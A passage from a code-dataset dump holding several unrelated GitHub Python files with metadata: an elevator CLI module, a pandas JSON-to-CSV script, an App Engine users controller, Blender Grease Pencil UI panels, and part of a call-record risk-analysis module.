from.\")\n\n\ndef _give_node_options(child_nodes, entries):\n\n while True:\n print(\"You have the following options to choose from: \", ', '.join(child_nodes), '\\n')\n option = user_input(\"Choose one of the options or you can go back by typing 'back': \")\n if option in child_nodes:\n entries.append(option)\n break\n elif option == \"back\":\n break\n else:\n print(\"The entry '\" + option + \"' is not in the current options.\\n\")\n\n\ndef _navigate_up_node_tree():\n \"\"\"Command to go up a level in the interface or return to the previous entry\"\"\"\n\n cli.Node.get_entries().pop()\n\n\ndef _run_node_callback():\n \"\"\"Command to execute a callback function\"\"\"\n\n current_node = cli.Node.get_current_node()\n if hasattr(current_node, \"callback\"):\n current_node.callback()\n", "repo_name": "YousefSalaman/Elevator-System", "sub_path": "src/Python/config/commands.py", "file_name": "commands.py", "file_ext": "py", "file_size_in_byte": 2165, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.version_info", "line_number": 9, "usage_type": "attribute"}, {"api_name": "tools.cli.Node.get_current_node", "line_number": 20, "usage_type": "call"}, {"api_name": "tools.cli.Node", "line_number": 20, "usage_type": "attribute"}, {"api_name": "tools.cli", "line_number": 20, "usage_type": "name"}, {"api_name": "tools.cli.Command.get_commands", "line_number": 30, "usage_type": "call"}, {"api_name": "tools.cli.Command", "line_number": 30, "usage_type": "attribute"}, {"api_name": "tools.cli", "line_number": 30, "usage_type": "name"}, {"api_name": "tools.cli.Node.get_entries", "line_number": 39, "usage_type": "call"}, {"api_name": "tools.cli.Node", "line_number": 39, "usage_type": "attribute"}, {"api_name": "tools.cli", "line_number": 39, "usage_type": "name"}, {"api_name": "tools.cli.Node.get_current_node", "line_number": 40, "usage_type": "call"}, {"api_name": "tools.cli.Node", "line_number": 40, "usage_type": "attribute"}, {"api_name": "tools.cli", "line_number": 40, "usage_type": "name"}, {"api_name": "tools.cli.Node.get_entries", "line_number": 68, "usage_type": "call"}, {"api_name": "tools.cli.Node", "line_number": 68, 
"usage_type": "attribute"}, {"api_name": "tools.cli", "line_number": 68, "usage_type": "name"}, {"api_name": "tools.cli.Node.get_current_node", "line_number": 74, "usage_type": "call"}, {"api_name": "tools.cli.Node", "line_number": 74, "usage_type": "attribute"}, {"api_name": "tools.cli", "line_number": 74, "usage_type": "name"}]}
+{"seq_id": "43534783845", "text": "\nimport pandas as pd\nimport json\nimport dask.dataframe as dd\nimport numpy as np\nimport zipfile\nimport glob\nimport numba\nimport os\n\nimport elementpath\nfrom xml.etree import ElementTree\nimport numpy as np\npd.options.display.max_columns = 999\n\ntarget_id = '2'\nfile_prefix = 'bsrobo4-risp-picking-'\ninput_path = 'C:/Users/magagnolif/Desktop/Materiale MPS/Materiale Progetti/RB4/PYTHON/input/'\nouput_path = 'C:/Users/magagnolif/Desktop/Materiale MPS/Materiale Progetti/RB4/PYTHON/output/'\n\n#get_ipython().run_cell_magic('time', '', \"df = pd.DataFrame()\\n\\nwith open(f'{input_path}{file_prefix}{target_id}'+'.json') as file:\\n json_data = json.load(file)\\n df_tmp = pd.DataFrame.from_records(pd.DataFrame(json_data['hits']['hits'])['_source'].values)\\n print(df_tmp)\\n df = pd.concat([df,df_tmp])\\ndf = df.reset_index(drop = True)\")\n\ndf = pd.DataFrame()\n\nwith open(f'{input_path}{file_prefix}{target_id}'+'.json') as file:\n json_data = json.load(file)\n df_tmp = pd.DataFrame.from_records(pd.DataFrame(json_data['hits']['hits'])['_source'].values)\n print(df_tmp)\n df = pd.concat([df,df_tmp])\ndf = df.reset_index(drop = True)\n\ndef extract_elements(group):\n def get_attr(el,key):\n return None if el.find(key) is None else el.find(key).text\n \n delta_plus = pd.DataFrame()\n filiale = group['filiale'].values[0]\n codiceGestore = group['codiceGestore'].values[0]\n outcome = group['outcome'].values[0]\n codiceCliente = group['codiceCliente'].values[0]\n delta_plus = pd.concat([delta_plus, pd.DataFrame([[\n filiale,\n codiceGestore,\n outcome,\n codiceCliente\n ]],\n columns = [\n 'filiale',\n 'codiceGestore',\n 'outcome',\n 'codiceCliente'\n ])])\n return delta_plus\n\noutput = df.groupby('codiceCliente').apply(extract_elements).reset_index(drop = True)\n#output = df.apply(extract_elements).reset_index(drop = True)\noutput.to_csv(f'{ouput_path}bsrobo4-risp-picking-{target_id}.csv',sep= ';', index = False)\n\ninput_files = os.listdir(f'{input_path}')\nprint(input_files)\nfor inputf in input_files:\n if(inputf.find('bsrobo4-risp-picking-') == -1):\n continue\n target_id = inputf.replace('bsrobo4-risp-picking-','').replace('.zip','');\n print('processing target_id'+target_id)\n\n\n\n", "repo_name": "AndreaBollino/MyPrograms", "sub_path": "robo4/monitoraggio-campagne.py", "file_name": "monitoraggio-campagne.py", "file_ext": "py", "file_size_in_byte": 2643, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.options", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 23, "usage_type": "call"}, {"api_name": "json.load", "line_number": 26, "usage_type": "call"}, {"api_name": "pandas.DataFrame.from_records", "line_number": 27, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 29, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 36, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 41, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 41, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 59, "usage_type": "call"}]}
+{"seq_id": "35342644394", "text": "'''\nCreated on 2009/08/01\n\n@author: takuji.shimokawa\n'''\n\nimport cgi\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp import template\nimport base_controller\nimport os\nfrom ..models.user import User\nfrom ..models.twitter_account import TwitterAccount\nimport logging\n\nclass UsersController(base_controller.BaseController):\n\n def index(self):\n user = User.get_current_user()\n if user == None:\n raise base_controller.LoginRequiredException(self.request.url)\n if self.request.get(\"oauth_token\", None):\n twitter_account = TwitterAccount(oauth_token=self.request.get(\"oauth_token\"))\n twitter_account.put()\n user.twitter_account = twitter_account\n user.put()\n self.redirect(user.path())\n\n def new(self):\n # ASSERT LOGGED IN\n self.response.headers['Content-Type'] = 'text/plain'\n self.response.out.write(\"UsersController NEW\")\n\n def show(self, user_id):\n user = User.get_current_user()\n if user == None:\n raise base_controller.LoginRequiredException(self.request.url)\n editable = False\n if user.key().id() == long(user_id):\n editable = True\n template_values = {\n 'user': user,\n 'editable': editable\n }\n path = os.path.join(self.VIEWS_PATH, \"users/show.%s\" % self.response_format)\n self.response.out.write(template.render(path, template_values))\n\n def edit(self, user_id):\n # ASSERT LOGGED IN\n self.response.headers['Content-Type'] = 'text/plain'\n self.response.out.write(\"UsersController EDIT: %s\" % user_id)\n\n def delete(self, user_id):\n # ASSERT LOGGED IN\n # ASSERT User is the owner of this message\n self.response.headers['Content-Type'] = 'text/plain'\n self.response.out.write(\"UsersController DELETE: %s\" % user_id)\n\n def update(self, user_id):\n logging.info(\"ENTER: users_controller.update\")\n user = User.get_current_user()\n if user == None:\n raise base_controller.LoginRequiredException(self.request.url)\n if user.key().id() != long(user_id):\n raise base_controller.Redirect(self.request.url)\n lat = self.request.get(\"lat\", None)\n lon = self.request.get(\"lon\", None)\n if lat != None and lon != None:\n # Update user location\n user.update_location(lat, lon)\n logging.info(\"User's location is updated!\")\n \n", "repo_name": "gdgkyoto/kyoto-gtug", "sub_path": "GoogleAppEngine20090808/python-group/geo_tweet/src/gt/controllers/users_controller.py", "file_name": "users_controller.py", "file_ext": "py", "file_size_in_byte": 2291, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "base_controller.BaseController", "line_number": 16, "usage_type": "attribute"}, {"api_name": "models.user.User.get_current_user", "line_number": 19, "usage_type": "call"}, {"api_name": "models.user.User", "line_number": 19, "usage_type": "name"}, {"api_name": "base_controller.LoginRequiredException", "line_number": 21, "usage_type": "call"}, {"api_name": "models.twitter_account.TwitterAccount", "line_number": 23, "usage_type": "call"}, {"api_name": "models.user.User.get_current_user", "line_number": 35, "usage_type": "call"}, {"api_name": "models.user.User", "line_number": 35, "usage_type": "name"}, {"api_name": "base_controller.LoginRequiredException", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.webapp.template.render", "line_number": 46, "usage_type": "call"}, 
{"api_name": "google.appengine.ext.webapp.template", "line_number": 46, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 60, "usage_type": "call"}, {"api_name": "models.user.User.get_current_user", "line_number": 61, "usage_type": "call"}, {"api_name": "models.user.User", "line_number": 61, "usage_type": "name"}, {"api_name": "base_controller.LoginRequiredException", "line_number": 63, "usage_type": "call"}, {"api_name": "base_controller.Redirect", "line_number": 65, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 71, "usage_type": "call"}]}
+{"seq_id": "32623987827", "text": "# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\n# \n\n\nfrom bpy.types import Menu, UIList\n\n\ndef gpencil_stroke_placement_settings(context, layout, gpd):\n col = layout.column(align=True)\n\n col.label(text=\"Stroke Placement:\")\n\n row = col.row(align=True)\n row.prop_enum(gpd, \"draw_mode\", 'VIEW')\n row.prop_enum(gpd, \"draw_mode\", 'CURSOR')\n\n if context.space_data.type == 'VIEW_3D':\n row = col.row(align=True)\n row.prop_enum(gpd, \"draw_mode\", 'SURFACE')\n row.prop_enum(gpd, \"draw_mode\", 'STROKE')\n\n row = col.row(align=False)\n row.active = gpd.draw_mode in {'SURFACE', 'STROKE'}\n row.prop(gpd, \"use_stroke_endpoints\")\n\n\nclass GreasePencilDrawingToolsPanel:\n # subclass must set\n # bl_space_type = 'IMAGE_EDITOR'\n bl_label = \"Grease Pencil\"\n bl_category = \"Grease Pencil\"\n bl_region_type = 'TOOLS'\n\n @staticmethod\n def draw(self, context):\n layout = self.layout\n\n col = layout.column(align=True)\n\n col.label(text=\"Draw:\")\n row = col.row(align=True)\n row.operator(\"gpencil.draw\", text=\"Draw\").mode = 'DRAW'\n row.operator(\"gpencil.draw\", text=\"Erase\").mode = 'ERASER'\n\n row = col.row(align=True)\n row.operator(\"gpencil.draw\", text=\"Line\").mode = 'DRAW_STRAIGHT'\n row.operator(\"gpencil.draw\", text=\"Poly\").mode = 'DRAW_POLY'\n\n row = col.row(align=True)\n row.prop(context.tool_settings, \"use_grease_pencil_sessions\", text=\"Continuous Drawing\")\n\n if context.space_data.type in {'VIEW_3D', 'CLIP_EDITOR'}:\n col.separator()\n col.label(\"Data Source:\")\n row = col.row(align=True)\n if context.space_data.type == 'VIEW_3D':\n row.prop(context.tool_settings, \"grease_pencil_source\", expand=True)\n elif context.space_data.type == 'CLIP_EDITOR':\n row.prop(context.space_data, \"grease_pencil_source\", expand=True)\n\n gpd = context.gpencil_data\n if gpd:\n col.separator()\n gpencil_stroke_placement_settings(context, col, gpd)\n\n if context.space_data.type == 'VIEW_3D':\n col.separator()\n col.separator()\n\n col.label(text=\"Tools:\")\n col.operator(\"gpencil.convert\", text=\"Convert...\")\n col.operator(\"view3d.ruler\")\n\n\nclass GreasePencilStrokeEditPanel:\n # subclass must set\n # bl_space_type = 'IMAGE_EDITOR'\n bl_label = \"Edit Strokes\"\n bl_category = \"Grease Pencil\"\n bl_region_type = 'TOOLS'\n\n @classmethod\n def poll(cls, context):\n return (context.gpencil_data is not None)\n\n @staticmethod\n def draw(self, context):\n layout = self.layout\n\n gpd = context.gpencil_data\n edit_ok = bool(context.editable_gpencil_strokes) and bool(gpd.use_stroke_edit_mode)\n\n col = layout.column(align=True)\n col.prop(gpd, \"use_stroke_edit_mode\", text=\"Enable Editing\", icon='EDIT', toggle=True)\n\n col.separator()\n\n col.label(text=\"Select:\")\n subcol = 
col.column(align=True)\n subcol.active = edit_ok\n subcol.operator(\"gpencil.select_all\", text=\"Select All\")\n subcol.operator(\"gpencil.select_border\")\n subcol.operator(\"gpencil.select_circle\")\n\n col.separator()\n\n subcol = col.column(align=True)\n subcol.active = edit_ok\n subcol.operator(\"gpencil.select_linked\")\n subcol.operator(\"gpencil.select_more\")\n subcol.operator(\"gpencil.select_less\")\n\n col.separator()\n\n col.label(text=\"Edit:\")\n row = col.row(align=True)\n row.active = edit_ok\n row.operator(\"gpencil.copy\", text=\"Copy\")\n row.operator(\"gpencil.paste\", text=\"Paste\")\n\n subcol = col.column(align=True)\n subcol.active = edit_ok\n subcol.operator(\"gpencil.delete\", text=\"Delete\")\n subcol.operator(\"gpencil.duplicate_move\", text=\"Duplicate\")\n subcol.operator(\"transform.mirror\", text=\"Mirror\").gpencil_strokes = True\n\n col.separator()\n\n subcol = col.column(align=True)\n subcol.active = edit_ok\n subcol.operator(\"transform.translate\").gpencil_strokes = True # icon='MAN_TRANS'\n subcol.operator(\"transform.rotate\").gpencil_strokes = True # icon='MAN_ROT'\n subcol.operator(\"transform.resize\", text=\"Scale\").gpencil_strokes = True # icon='MAN_SCALE'\n\n col.separator()\n\n subcol = col.column(align=True)\n subcol.active = edit_ok\n subcol.operator(\"transform.bend\", text=\"Bend\").gpencil_strokes = True\n subcol.operator(\"transform.shear\", text=\"Shear\").gpencil_strokes = True\n subcol.operator(\"transform.tosphere\", text=\"To Sphere\").gpencil_strokes = True\n\n\n###############################\n\nclass GPENCIL_PIE_tool_palette(Menu):\n \"\"\"A pie menu for quick access to Grease Pencil tools\"\"\"\n bl_label = \"Grease Pencil Tools\"\n\n def draw(self, context):\n layout = self.layout\n\n pie = layout.menu_pie()\n gpd = context.gpencil_data\n\n # W - Drawing Types\n col = pie.column()\n col.operator(\"gpencil.draw\", text=\"Draw\", icon='GREASEPENCIL').mode = 'DRAW'\n col.operator(\"gpencil.draw\", text=\"Straight Lines\", icon='LINE_DATA').mode = 'DRAW_STRAIGHT'\n col.operator(\"gpencil.draw\", text=\"Poly\", icon='MESH_DATA').mode = 'DRAW_POLY'\n\n # E - Eraser\n # XXX: needs a dedicated icon...\n col = pie.column()\n col.operator(\"gpencil.draw\", text=\"Eraser\", icon='FORCE_CURVE').mode = 'ERASER'\n\n # E - \"Settings\" Palette is included here too, since it needs to be in a stable position...\n if gpd and gpd.layers.active:\n col.separator()\n col.operator(\"wm.call_menu_pie\", text=\"Settings...\", icon='SCRIPTWIN').name = \"GPENCIL_PIE_settings_palette\"\n\n # Editing tools\n if gpd:\n if gpd.use_stroke_edit_mode and context.editable_gpencil_strokes:\n # S - Exit Edit Mode\n pie.prop(gpd, \"use_stroke_edit_mode\", text=\"Exit Edit Mode\", icon='EDIT')\n\n # N - Transforms\n col = pie.column()\n row = col.row(align=True)\n row.operator(\"transform.translate\", icon='MAN_TRANS').gpencil_strokes = True\n row.operator(\"transform.rotate\", icon='MAN_ROT').gpencil_strokes = True\n row.operator(\"transform.resize\", text=\"Scale\", icon='MAN_SCALE').gpencil_strokes = True\n row = col.row(align=True)\n row.label(\"Proportional Edit:\")\n row.prop(context.tool_settings, \"proportional_edit\", text=\"\", icon_only=True)\n row.prop(context.tool_settings, \"proportional_edit_falloff\", text=\"\", icon_only=True)\n\n # NW - Select (Non-Modal)\n col = pie.column()\n col.operator(\"gpencil.select_all\", text=\"Select All\", icon='PARTICLE_POINT')\n col.operator(\"gpencil.select_all\", text=\"Select Inverse\", icon='BLANK1')\n 
col.operator(\"gpencil.select_linked\", text=\"Select Linked\", icon='LINKED')\n\n # NE - Select (Modal)\n col = pie.column()\n col.operator(\"gpencil.select_border\", text=\"Border Select\", icon='BORDER_RECT')\n col.operator(\"gpencil.select_circle\", text=\"Circle Select\", icon='META_EMPTY')\n col.operator(\"gpencil.select_lasso\", text=\"Lasso Select\", icon='BORDER_LASSO')\n\n # SW - Edit Tools\n col = pie.column()\n col.operator(\"gpencil.duplicate_move\", icon='PARTICLE_PATH', text=\"Duplicate\")\n col.operator(\"gpencil.delete\", icon='X', text=\"Delete...\")\n\n # SE - More Tools\n pie.operator(\"wm.call_menu_pie\", text=\"More...\").name = \"GPENCIL_PIE_tools_more\"\n else:\n # Toggle Edit Mode\n pie.prop(gpd, \"use_stroke_edit_mode\", text=\"Enable Stroke Editing\", icon='EDIT')\n\n\nclass GPENCIL_PIE_settings_palette(Menu):\n \"\"\"A pie menu for quick access to Grease Pencil settings\"\"\"\n bl_label = \"Grease Pencil Settings\"\n\n @classmethod\n def poll(cls, context):\n return bool(context.gpencil_data and context.active_gpencil_layer)\n\n def draw(self, context):\n layout = self.layout\n\n pie = layout.menu_pie()\n # gpd = context.gpencil_data\n gpl = context.active_gpencil_layer\n\n # W - Stroke draw settings\n col = pie.column(align=True)\n col.label(text=\"Stroke\")\n col.prop(gpl, \"color\", text=\"\")\n col.prop(gpl, \"alpha\", text=\"\", slider=True)\n\n # E - Fill draw settings\n col = pie.column(align=True)\n col.label(text=\"Fill\")\n col.prop(gpl, \"fill_color\", text=\"\")\n col.prop(gpl, \"fill_alpha\", text=\"\", slider=True)\n\n # S - Layer settings\n col = pie.column()\n col.prop(gpl, \"line_width\", slider=True)\n # col.prop(gpl, \"use_volumetric_strokes\")\n col.prop(gpl, \"use_onion_skinning\")\n\n # N - Active Layer\n # XXX: this should show an operator to change the active layer instead\n col = pie.column()\n col.label(\"Active Layer: \")\n col.prop(gpl, \"info\", text=\"\")\n # col.prop(gpd, \"layers\")\n row = col.row()\n row.prop(gpl, \"lock\")\n row.prop(gpl, \"hide\")\n\n\nclass GPENCIL_PIE_tools_more(Menu):\n \"\"\"A pie menu for accessing more Grease Pencil tools\"\"\"\n bl_label = \"More Grease Pencil Tools\"\n\n @classmethod\n def poll(cls, context):\n gpd = context.gpencil_data\n return bool(gpd and gpd.use_stroke_edit_mode and context.editable_gpencil_strokes)\n\n def draw(self, context):\n layout = self.layout\n\n pie = layout.menu_pie()\n # gpd = context.gpencil_data\n\n col = pie.column(align=True)\n col.operator(\"gpencil.copy\", icon='COPYDOWN', text=\"Copy\")\n col.operator(\"gpencil.paste\", icon='PASTEDOWN', text=\"Paste\")\n\n col = pie.column(align=True)\n col.operator(\"gpencil.select_more\", icon='ZOOMIN')\n col.operator(\"gpencil.select_less\", icon='ZOOMOUT')\n\n pie.operator(\"transform.mirror\", icon='MOD_MIRROR').gpencil_strokes = True\n pie.operator(\"transform.bend\", icon='MOD_SIMPLEDEFORM').gpencil_strokes = True\n pie.operator(\"transform.shear\", icon='MOD_TRIANGULATE').gpencil_strokes = True\n pie.operator(\"transform.tosphere\", icon='MOD_MULTIRES').gpencil_strokes = True\n\n pie.operator(\"gpencil.convert\", icon='OUTLINER_OB_CURVE', text=\"Convert...\")\n pie.operator(\"wm.call_menu_pie\", text=\"Back to Main Palette...\").name = \"GPENCIL_PIE_tool_palette\"\n\n\n###############################\n\nclass GPENCIL_UL_layer(UIList):\n def draw_item(self, context, layout, data, item, icon, active_data, active_propname, index):\n # assert(isinstance(item, bpy.types.GPencilLayer)\n gpl = item\n\n if self.layout_type in 
{'DEFAULT', 'COMPACT'}:\n if gpl.lock:\n layout.active = False\n\n split = layout.split(percentage=0.25)\n row = split.row(align=True)\n row.prop(gpl, \"color\", text=\"\", emboss=gpl.is_stroke_visible)\n row.prop(gpl, \"fill_color\", text=\"\", emboss=gpl.is_fill_visible)\n split.prop(gpl, \"info\", text=\"\", emboss=False)\n\n row = layout.row(align=True)\n row.prop(gpl, \"lock\", text=\"\", emboss=False)\n row.prop(gpl, \"hide\", text=\"\", emboss=False)\n elif self.layout_type == 'GRID':\n layout.alignment = 'CENTER'\n layout.label(text=\"\", icon_value=icon)\n\n\nclass GreasePencilDataPanel:\n # subclass must set\n # bl_space_type = 'IMAGE_EDITOR'\n bl_label = \"Grease Pencil\"\n bl_region_type = 'UI'\n\n @staticmethod\n def draw_header(self, context):\n self.layout.prop(context.space_data, \"show_grease_pencil\", text=\"\")\n\n @staticmethod\n def draw(self, context):\n layout = self.layout\n\n # owner of Grease Pencil data\n gpd_owner = context.gpencil_data_owner\n gpd = context.gpencil_data\n\n # Owner Selector\n if context.space_data.type == 'VIEW_3D':\n layout.prop(context.tool_settings, \"grease_pencil_source\", expand=True)\n elif context.space_data.type == 'CLIP_EDITOR':\n layout.prop(context.space_data, \"grease_pencil_source\", expand=True)\n\n # Grease Pencil data selector\n layout.template_ID(gpd_owner, \"grease_pencil\", new=\"gpencil.data_add\", unlink=\"gpencil.data_unlink\")\n\n # Grease Pencil data...\n if (gpd is None) or (not gpd.layers):\n layout.operator(\"gpencil.layer_add\", text=\"New Layer\")\n else:\n self.draw_layers(context, layout, gpd)\n\n def draw_layers(self, context, layout, gpd):\n row = layout.row()\n\n col = row.column()\n if len(gpd.layers) >= 2:\n layer_rows = 5\n else:\n layer_rows = 2\n col.template_list(\"GPENCIL_UL_layer\", \"\", gpd, \"layers\", gpd.layers, \"active_index\", rows=layer_rows)\n\n col = row.column()\n\n sub = col.column(align=True)\n sub.operator(\"gpencil.layer_add\", icon='ZOOMIN', text=\"\")\n sub.operator(\"gpencil.layer_remove\", icon='ZOOMOUT', text=\"\")\n\n gpl = context.active_gpencil_layer\n if gpl:\n sub.operator(\"gpencil.layer_duplicate\", icon='COPY_ID', text=\"\") # XXX: needs a dedicated icon\n\n if len(gpd.layers) > 1:\n col.separator()\n\n sub = col.column(align=True)\n sub.operator(\"gpencil.layer_move\", icon='TRIA_UP', text=\"\").type = 'UP'\n sub.operator(\"gpencil.layer_move\", icon='TRIA_DOWN', text=\"\").type = 'DOWN'\n\n if gpl:\n self.draw_layer(layout, gpl)\n\n def draw_layer(self, layout, gpl):\n # layer settings\n split = layout.split(percentage=0.5)\n split.active = not gpl.lock\n\n # Column 1 - Stroke\n col = split.column(align=True)\n col.label(text=\"Stroke:\")\n col.prop(gpl, \"color\", text=\"\")\n col.prop(gpl, \"alpha\", slider=True)\n\n # Column 2 - Fill\n col = split.column(align=True)\n col.label(text=\"Fill:\")\n col.prop(gpl, \"fill_color\", text=\"\")\n col.prop(gpl, \"fill_alpha\", text=\"Opacity\", slider=True)\n\n # Options\n split = layout.split(percentage=0.5)\n split.active = not gpl.lock\n\n col = split.column(align=True)\n col.prop(gpl, \"line_width\", slider=True)\n col.prop(gpl, \"use_volumetric_strokes\")\n\n col = split.column(align=True)\n col.prop(gpl, \"show_x_ray\")\n col.prop(gpl, \"show_points\", text=\"Points\")\n\n layout.separator()\n\n # Full-Row - Frame Locking (and Delete Frame)\n row = layout.row(align=True)\n row.active = not gpl.lock\n\n if gpl.active_frame:\n lock_status = \"Locked\" if gpl.lock_frame else \"Unlocked\"\n lock_label = \"Frame: %d (%s)\" % 
(gpl.active_frame.frame_number, lock_status)\n else:\n lock_label = \"Lock Frame\"\n row.prop(gpl, \"lock_frame\", text=lock_label, icon='UNLOCKED')\n row.operator(\"gpencil.active_frame_delete\", text=\"\", icon='X')\n\n layout.separator()\n\n # Onion skinning\n col = layout.column(align=True)\n col.active = not gpl.lock\n\n row = col.row()\n row.prop(gpl, \"use_onion_skinning\")\n row.prop(gpl, \"use_ghost_custom_colors\", text=\"\", icon='COLOR')\n\n split = col.split(percentage=0.5)\n split.active = gpl.use_onion_skinning\n\n # - Before Frames\n sub = split.column(align=True)\n row = sub.row(align=True)\n row.active = gpl.use_ghost_custom_colors\n row.prop(gpl, \"before_color\", text=\"\")\n sub.prop(gpl, \"ghost_before_range\", text=\"Before\")\n\n # - After Frames\n sub = split.column(align=True)\n row = sub.row(align=True)\n row.active = gpl.use_ghost_custom_colors\n row.prop(gpl, \"after_color\", text=\"\")\n sub.prop(gpl, \"ghost_after_range\", text=\"After\")\n\n\nclass GreasePencilToolsPanel:\n # subclass must set\n # bl_space_type = 'IMAGE_EDITOR'\n # bl_options = {'DEFAULT_CLOSED'}\n bl_label = \"Grease Pencil Settings\"\n bl_region_type = 'UI'\n\n @classmethod\n def poll(cls, context):\n return (context.gpencil_data is not None)\n\n @staticmethod\n def draw(self, context):\n layout = self.layout\n\n # gpd_owner = context.gpencil_data_owner\n gpd = context.gpencil_data\n\n layout.prop(gpd, \"use_stroke_edit_mode\", text=\"Enable Editing\", icon='EDIT', toggle=True)\n\n layout.separator()\n\n layout.label(\"Proportional Edit:\")\n row = layout.row()\n row.prop(context.tool_settings, \"proportional_edit\", text=\"\")\n row.prop(context.tool_settings, \"proportional_edit_falloff\", text=\"\")\n\n layout.separator()\n layout.separator()\n\n gpencil_stroke_placement_settings(context, layout, gpd)\n", "repo_name": "Squashwell/bepuik", "sub_path": "release/scripts/startup/bl_ui/properties_grease_pencil_common.py", "file_name": "properties_grease_pencil_common.py", "file_ext": "py", "file_size_in_byte": 17777, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 57, "dataset": "github-code", "pt": "53", "api": [{"api_name": "bpy.types.Menu", "line_number": 163, "usage_type": "name"}, {"api_name": "bpy.types.Menu", "line_number": 230, "usage_type": "name"}, {"api_name": "bpy.types.Menu", "line_number": 274, "usage_type": "name"}, {"api_name": "bpy.types.UIList", "line_number": 308, "usage_type": "name"}]}
+{"seq_id": "6202423053", "text": "# coding: utf-8\nimport datetime\nfrom collections import Counter\nfrom operator import itemgetter, attrgetter\nimport re\nimport time\nfrom functools import partial\nfrom ..constants import RiskEvaluation\nfrom app.core.functions import save_to_cache\n\n\ndef judge_day_serial():\n \"\"\" 判断两个时间是否连续 \"\"\"\n pass\n\n\ndef second_to_minute(t):\n t = int(t or 0)\n # if t % 60 == 0:\n # return t // 60\n # return t // 60 + 1\n return float('%.2f' % (t / 60))\n\ndef two_num(d):\n if d == 0:\n return float(d)\n return float('%.2f' % d)\n\ndef cao_time_time_to_str(d):\n\n if d == 0:\n return ''\n\n if not d:\n return d\n timeArray = time.localtime(d)\n otherStyleTime = time.strftime(\"%Y-%m-%d\", timeArray)\n return otherStyleTime\n\n\nclass UserExceptionAction:\n \"\"\"\n 用户异常行为分析\n \"\"\"\n __slots__ = ('data')\n\n def time_trans(self, t_s):\n return datetime.datetime.strptime(t_s, \"%Y%m%d\")\n\n def __init__(self, data):\n self.data = data\n\n def long_time_slicense(self, data_r, flag, now=None):\n \"\"\" 长时间静默 \"\"\"\n # data = self.data.get('silenceInfo', []).copy()\n data = data_r.copy()\n key = 'connDate'\n data = sorted(data, key=lambda x:int(x.get(key, 0)))\n if not data and flag is False:\n\n return {\n \"name\": \"手机长时间静默情况\",\n \"result\": '',\n \"accord\": '',\n \"assess\": 6,\n }\n if not data:\n return {\n \"name\": \"手机长时间静默情况\",\n \"result\": '0',\n \"accord\": '近6个月出现0次手机长时间静默情况,失联风险低',\n \"assess\": 1,\n }\n try:\n result = []\n if now is None:\n now = datetime.datetime.now().strftime('%Y%m%d')\n data.append({'connDate': now, 'connTimes': 1})\n last_t = self.time_trans(data[0].get(key))\n for index in range(1, len(data)):\n now_t = self.time_trans(data[index].get(key))\n if (now_t - last_t).days > 10:\n result.append({'days': (now_t - last_t).days, \"st\": last_t, \"end\": now_t})\n last_t = now_t\n result = sorted(result, key=itemgetter('days', \"st\"), reverse=False)\n\n def out_put(src):\n \"\"\" 整理成前端所需要的格式 \"\"\"\n out_put = []\n template = \"静默{0}天,时间{1}~{2}\"\n for value in src:\n out_put.append(template.format(\n value['days'], value['st'].strftime(\"%Y-%m-%d\"), value['end'].strftime(\"%Y-%m-%d\")\n ))\n # l = '近6个月出现3次手机长时间静默情况,失联风险{}'\n risk = {\n 0: '低',\n 1: '关注',\n 2: '高'\n }\n level = 0\n if len(src):\n if src[-1]['days'] <= 10:\n level = 0\n elif src[-1]['days'] <= 30:\n level = 1\n else:\n level = 2\n l = '近6个月出现{}次长时间手机静默情况,失联风险{}'.format(len(result), risk[level])\n\n for i in out_put:\n l = l + '' + i + ' '\n l = l + ' '\n if len(result) == 0:\n l = '近6个月无连续10天通话记录为空情况'\n return len(result), l, level\n\n max_result = result[-1]['days'] if result else 0\n assess, name, result = out_put(result)\n d = {\n 0: 1,\n 1: 2,\n 2: 4\n }\n return {\n \"name\": \"手机长时间静默情况\",\n \"result\": assess,\n \"accord\": name,\n \"assess\": d[result],\n 'max_result': max_result,\n }\n except:\n import traceback\n traceback.print_exc()\n return {\n \"name\": \"手机长时间静默情况\",\n \"result\": '0',\n \"accord\": '近6个月出现0次手机长时间静默情况,失联风险低',\n \"assess\": 1,\n 'max_result': 0,\n }\n\n def night_phone(self, data_r, flag):\n \"\"\" 夜间通话占比 \"\"\"\n if data_r is None:\n data_r = {}\n\n def judge_night(d):\n def calcu(t):\n try:\n if 0 <= int(t[0:2]) <= 4:\n return True\n return False\n except:\n return False\n\n if d['connTime'] == '2330' or d['connTime'] == '0500' or calcu(d['connTime']):\n return True\n return False\n\n # data = self.data.get('deceitRisk', {}).get('callDuration', []).copy()\n data = data_r.copy()\n if not data and flag is False:\n\n return 
